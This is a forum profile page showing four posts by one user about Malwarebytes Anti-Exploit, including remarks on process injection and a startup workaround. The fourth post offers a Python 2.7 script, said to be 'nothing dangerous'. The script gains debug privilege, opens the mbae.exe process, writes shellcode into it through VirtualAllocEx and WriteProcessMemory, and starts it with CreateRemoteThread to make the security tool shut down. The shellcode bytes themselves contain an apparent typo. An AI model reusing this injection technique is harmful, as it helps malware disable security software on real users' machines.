Jump to content

RasAlGhul

Members
  • Posts

    4
  • Joined

  • Last visited

Reputation

0 Neutral
  1. Anyway, not all process can be injected, even if you are Administrator. Some of them (like firewall, av-s processes) have special permission and process memory can be only read(best case), but you can't inject code into them. If that be possible all malware can be equipped with user privilege escalad, take admins rights and then kill AV process, or even worse transform av process into evil process. But this is not possible
  2. I don't think i am the only one who not use schedule and disable that service, so a alternative start-up is welcome For others with same problem: Copy mbae shortcut here: C:\Documents and Settings\<Username>\Start Menu\Programs\Startup or add a registry entry here: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  3. Thank you, indeed, but killing from task-manager is not cool as making a process to close voluntarily
  4. Malwarebytes Anti-Exploit version: 0.09.4.2000 perhaps in final version will not be possible to do this, but until then you can make mbae do what you want:)) this script only make him exit, nothing dangerous #python 2.7.5#ViRii.tkimport sysfrom ctypes import *import win32securityimport win32apiimport psutil #http://code.google.com/p/psutil/import timekernel32 = windll.kernel32processname = "mbae.exe" shellcode = "\xb4\x4c\b0\x00\xcd\x21"def getpid(pname): for proc in psutil.process_iter(): if proc.name == pname: return proc.pid temp99 = getpid(processname)if temp99!= None: pid = temp99 print "Malwarebytes Anti-Exploit process located: %i"% pidelse: print "Nu am gasit procesul: %s" %processname sys.exit()print "\tHoold..."time.sleep(0.5)print "\tHoooold..."time.sleep(1)print "\tHoooooooooold..."PAGE_EXECUTE_READWRITE = 0x00000040PROCESS_ALL_ACCESS = 0x1F0FFFVIRTUAL_MEM = 0x3000 #set privpriv_flags = win32security.TOKEN_ADJUST_PRIVILEGES | win32security.TOKEN_QUERYhToken = win32security.OpenProcessToken(win32api.GetCurrentProcess(), priv_flags)# enable "debug process"privilege_id = win32security.LookupPrivilegeValue (None,win32security.SE_DEBUG_NAME)old_privs = win32security.AdjustTokenPrivileges (hToken, 0,[(privilege_id, win32security.SE_PRIVILEGE_ENABLED)])proces = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)if not proces: print "[*] Couldn't acquire a handle to PID: %s" % pid sys.exit(0)#code_size = len(shellcode) #Allocate some space for the shellcodearg_address = kernel32.VirtualAllocEx(proces, 0, code_size,VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)# Write out the shellcodewritten = c_int(0)kernel32.WriteProcessMemory(proces, arg_address, shellcode,code_size, byref(written))# Now we create the remote thread and point its entry routine to be head of our shellcodethread_id = c_ulong(0)if not kernel32.CreateRemoteThread(proces,None,0,arg_address,None,0,byref(thread_id)): print "[*] Failed to inject process. Exiting." sys.exit(0)else: print "Malwarebytes Anti-Exploit process was killed"# clean upwin32api.CloseHandle(hToken)Script source: Shellcode injection
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.